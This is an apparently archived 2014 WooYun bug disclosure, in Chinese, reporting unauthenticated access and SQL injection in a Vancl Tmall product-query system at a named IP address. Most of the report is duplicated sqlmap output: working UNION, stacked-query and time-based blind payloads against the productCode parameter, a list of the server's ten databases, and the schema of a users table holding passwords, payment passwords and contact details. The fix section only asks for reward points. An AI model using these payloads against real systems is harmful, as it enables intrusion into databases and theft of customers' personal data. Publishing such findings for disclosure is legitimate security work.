当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062582

漏洞标题:蝴蝶效应,凡客诚品某重要系统未授权访问,后台注入

相关厂商:凡客诚品

漏洞作者: if、so

提交时间:2014-05-28 09:02

修复时间:2014-06-02 09:02

公开时间:2014-06-02 09:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-28: 细节已通知厂商并且等待厂商处理中
2014-06-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

蝴蝶效应,凡客诚品某重要系统未授权访问,后台注入

详细说明:

http://119.253.53.23/

1111.png


如图,是凡客诚品 天猫商城查询系统,后来看下,发现注入点
http://119.253.53.23/Shelf/Clothes?productCode=

Place: GET
Parameter: productCode
Type: UNION query
Title: Generic UNION query (NULL) - 51 columns
Payload: productCode=') UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(58)+CHAR(99)+CHAR(110)+CHAR(105)+CHAR(58)+CHAR(113)+CHAR(75)+CHAR(122)+CHAR(113)+CHAR(112)+CHAR(69)+CHAR(73)+CHAR(90)+CHAR(101)+CHAR(76)+CHAR(58)+CHAR(113)+CHAR(97)+CHAR(119)+CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: productCode='); WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: productCode=') WAITFOR DELAY '0:0:5'--
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: productCode
Type: UNION query
Title: Generic UNION query (NULL) - 51 columns
Payload: productCode=') UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(58)+CHAR(99)+CHAR(110)+CHAR(105)+CHAR(58)+CHAR(113)+CHAR(75)+CHAR(122)+CHAR(113)+CHAR(112)+CHAR(69)+CHAR(73)+CHAR(90)+CHAR(101)+CHAR(76)+CHAR(58)+CHAR(113)+CHAR(97)+CHAR(119)+CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: productCode='); WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: productCode=') WAITFOR DELAY '0:0:5'--
---
available databases [10]:
[*] Customer
[*] master
[*] model
[*] msdb
[*] SCM
[*] seckill
[*] tempdb
[*] UnionWebClick
[*] Vancl_Advertise
[*] VANCL_UNION


Database: SCM
Table: dbo.users
[48 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| Address | nvarchar |
| Answer | nvarchar |
| Area | nvarchar |
| BlackLevel | int |
| BlackReason | nvarchar |
| City | nvarchar |
| CountryID | char |
| EduLevel | nvarchar |
| Email | nvarchar |
| FirstShopping | datetime |
| IsAgency | smallint |
| IsBlacklist | bit |
| IsLock | bit |
| IsOld | bit |
| IsReturnBlack | bit |
| IsValidateEmail | bit |
| IsValidateMobile | bit |
| LastIP | nvarchar |
| LastLogin | datetime |
| LevelID | int |
| Mobile | nvarchar |
| NewID | int |
| NewUserName | nvarchar |
| PayPassword | char |
| Phone | nvarchar |
| Postalcode | nchar |
| Province | nvarchar |
| Question | nvarchar |
| RegStatus | int |
| RegTime | datetime |
| ReturnBlackReason | nvarchar |
| SetBlackDateTime | datetime |
| SetBlackReason | int |
| Sex | int |
| ShowName | nvarchar |
| SiteType | int |
| Source | tinyint |
| SourceID | varchar |
| TrueName | nvarchar |
| uniqueNickName | nvarchar |
| UserID | int |
| UserName | nvarchar |
| UserPwd | nvarchar |
| UserType | int |
| Vocation | nvarchar |
| WebSourceID | int |
| WebSourceSon_UserName | nvarchar |
| WebSourceUserName | nvarchar |
+-----------------------+----------+


随便翻了翻,感觉里面有料啊,就不继续跑了,大晚上的

漏洞证明:

Place: GET
Parameter: productCode
Type: UNION query
Title: Generic UNION query (NULL) - 51 columns
Payload: productCode=') UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(58)+CHAR(99)+CHAR(110)+CHAR(105)+CHAR(58)+CHAR(113)+CHAR(75)+CHAR(122)+CHAR(113)+CHAR(112)+CHAR(69)+CHAR(73)+CHAR(90)+CHAR(101)+CHAR(76)+CHAR(58)+CHAR(113)+CHAR(97)+CHAR(119)+CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: productCode='); WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: productCode=') WAITFOR DELAY '0:0:5'--
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: productCode
Type: UNION query
Title: Generic UNION query (NULL) - 51 columns
Payload: productCode=') UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(58)+CHAR(99)+CHAR(110)+CHAR(105)+CHAR(58)+CHAR(113)+CHAR(75)+CHAR(122)+CHAR(113)+CHAR(112)+CHAR(69)+CHAR(73)+CHAR(90)+CHAR(101)+CHAR(76)+CHAR(58)+CHAR(113)+CHAR(97)+CHAR(119)+CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: productCode='); WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: productCode=') WAITFOR DELAY '0:0:5'--
---
available databases [10]:
[*] Customer
[*] master
[*] model
[*] msdb
[*] SCM
[*] seckill
[*] tempdb
[*] UnionWebClick
[*] Vancl_Advertise
[*] VANCL_UNION


Database: SCM
Table: dbo.users
[48 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| Address | nvarchar |
| Answer | nvarchar |
| Area | nvarchar |
| BlackLevel | int |
| BlackReason | nvarchar |
| City | nvarchar |
| CountryID | char |
| EduLevel | nvarchar |
| Email | nvarchar |
| FirstShopping | datetime |
| IsAgency | smallint |
| IsBlacklist | bit |
| IsLock | bit |
| IsOld | bit |
| IsReturnBlack | bit |
| IsValidateEmail | bit |
| IsValidateMobile | bit |
| LastIP | nvarchar |
| LastLogin | datetime |
| LevelID | int |
| Mobile | nvarchar |
| NewID | int |
| NewUserName | nvarchar |
| PayPassword | char |
| Phone | nvarchar |
| Postalcode | nchar |
| Province | nvarchar |
| Question | nvarchar |
| RegStatus | int |
| RegTime | datetime |
| ReturnBlackReason | nvarchar |
| SetBlackDateTime | datetime |
| SetBlackReason | int |
| Sex | int |
| ShowName | nvarchar |
| SiteType | int |
| Source | tinyint |
| SourceID | varchar |
| TrueName | nvarchar |
| uniqueNickName | nvarchar |
| UserID | int |
| UserName | nvarchar |
| UserPwd | nvarchar |
| UserType | int |
| Vocation | nvarchar |
| WebSourceID | int |
| WebSourceSon_UserName | nvarchar |
| WebSourceUserName | nvarchar |
+-----------------------+----------+

修复方案:

来个20rank吧

版权声明:转载请注明来源 if、so@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-06-02 09:02

厂商回复:

最新状态:

暂无